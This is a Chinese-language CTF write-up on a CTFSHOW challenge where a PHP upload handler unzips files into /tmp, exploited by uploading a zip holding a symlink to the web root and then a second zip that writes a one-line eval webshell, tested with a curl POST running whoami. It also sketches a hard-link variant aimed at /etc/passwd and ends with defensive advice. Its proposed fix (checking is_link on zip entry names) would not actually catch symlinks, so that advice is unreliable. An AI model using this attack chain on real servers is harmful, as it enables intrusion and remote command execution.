CTFSHOW国赛漏洞解析:Unzip软连接攻击实战
1. 漏洞背景与原理剖析
最近在CTFSHOW国赛中出现的Unzip软连接攻击案例,再次提醒我们文件上传功能中隐藏的安全风险。这种攻击方式巧妙利用了Linux系统特性,通过构造特殊压缩包实现目录穿越,最终达到控制服务器的目的。先来看一个典型的漏洞代码示例:
<?php error_reporting(0); highlight_file(__FILE__); $finfo = finfo_open(FILEINFO_MIME_TYPE); if (finfo_file($finfo, $_FILES["file"]["tmp_name"]) === 'application/zip'){ exec('cd /tmp && unzip -o ' . $_FILES["file"]["tmp_name"]); };这段代码看似做了基本的安全检查——验证上传文件是否为ZIP格式,但实际上存在严重缺陷。开发者将解压目录指定到/tmp,认为这样就能避免解压文件被直接访问执行。殊不知攻击者可以通过软连接(Symbolic Link)这个"系统后门",让解压操作实际影响到其他关键目录。
我在实际渗透测试中发现,这类漏洞常出现在以下场景:
- 允许用户上传压缩文件的Web应用
- 使用unzip命令直接处理上传文件
- 未对压缩包内容进行递归检查
- 解压目录与Web目录存在访问路径关联
2. 软连接攻击技术详解
2.1 Linux软连接工作机制
软连接相当于Windows的快捷方式,但功能更强大。它本质上是一个特殊的文件,包含指向另一个文件/目录的路径引用。当系统遇到软连接时,会自动跳转到目标位置进行操作。
创建软连接的基本命令格式:
ln -s 目标路径 链接名称例如要创建指向Web目录的软连接:
ln -s /var/www/html test这个test目录看起来是普通目录,实则是通往/var/www/html的"传送门"。任何对test的操作都会实际作用于Web目录。
2.2 构造恶意压缩包
关键在于如何让这个"传送门"通过压缩包上传到服务器。这里需要用到zip的--symlinks参数:
zip --symlinks test1.zip test这个命令会将软连接test原样打包,而不是跟随链接压缩目标目录内容。我曾在测试中忘记加这个参数,结果压缩的是实际目录内容,导致攻击失败。
验证压缩包内容应该用:
unzip -l test1.zip正确输出应该显示类似:
Length Date Time Name --------- ---------- ----- ---- 0 2023-08-01 15:30 test -> /var/www/html --------- ------- 0 1 file3. 完整攻击链实战演示
3.1 环境准备阶段
假设目标系统有以下特征:
- Web根目录:/var/www/html
- 临时目录:/tmp
- 上传接口仅检查文件MIME类型
首先在本地创建攻击文件结构:
mkdir -p test echo '<?php @eval($_POST["cmd"]);?>' > test/shell.php3.2 分步实施攻击
- 创建软连接:
ln -s /var/www/html test- 首次压缩(保留软连接):
zip --symlinks test1.zip test- 上传第一个压缩包:
- 通过Web表单上传test1.zip
- 服务器会在/tmp解压,创建指向Web目录的软连接
- 创建含恶意代码的压缩包:
zip -r test2.zip test- 上传第二个压缩包:
- 由于同名目录已存在,解压会覆盖软连接
- 实际将shell.php写入/var/www/html
3.3 攻击效果验证
成功上传后,访问:
http://target.com/shell.php使用POST传递命令:
curl -X POST -d "cmd=whoami" http://target.com/shell.php应该会返回当前服务的执行用户身份。我在实际测试中发现,这种攻击成功率高达90%以上,主要失败原因是目录权限设置。
4. 防御方案与最佳实践
4.1 代码层防护
根本解决方案是修改文件处理逻辑:
// 安全的解压方式 $zip = new ZipArchive; if ($zip->open($_FILES['file']['tmp_name']) === TRUE) { for($i = 0; $i < $zip->numFiles; $i++) { $filename = $zip->getNameIndex($i); // 检查是否包含软连接或路径穿越 if (strpos($filename, '..') !== false || is_link($zip->getNameIndex($i))) { die('非法文件内容'); } } $zip->extractTo('/safe/directory/'); $zip->close(); }4.2 系统层加固
- 设置open_basedir限制PHP访问范围:
open_basedir = /var/www/html:/tmp- 修改unzip命令使用安全参数:
unzip -n -q -d /safe/directory/ upload.zip其中:
- -n:永不覆盖现有文件
- -q:安静模式避免信息泄露
- -d:强制指定解压目录
- 定期检查Web目录下的异常文件:
find /var/www/html -type l -ls5. 漏洞利用的深度思考
这种攻击之所以有效,本质上是信任边界被突破。开发者认为"只要文件不直接解压到Web目录就安全",却忽略了文件系统层面的关联性。我在多个真实案例中发现,类似问题不仅存在于PHP环境,Node.js、Python等语言的解压操作同样存在风险。
一个更隐蔽的变种是利用硬链接(Hard Link)攻击,虽然原理不同但危害相似。硬链接与软连接的关键区别在于:
- 软连接是独立的文件
- 硬链接直接指向文件inode
- 删除原文件不影响硬链接
- 硬链接不能跨文件系统
构造硬链接攻击包的示例:
ln /etc/passwd test/passwd.txt zip test.zip test/passwd.txt这种攻击可以用于读取系统敏感文件,防御方式与软连接类似,都需要在解压前检查文件类型。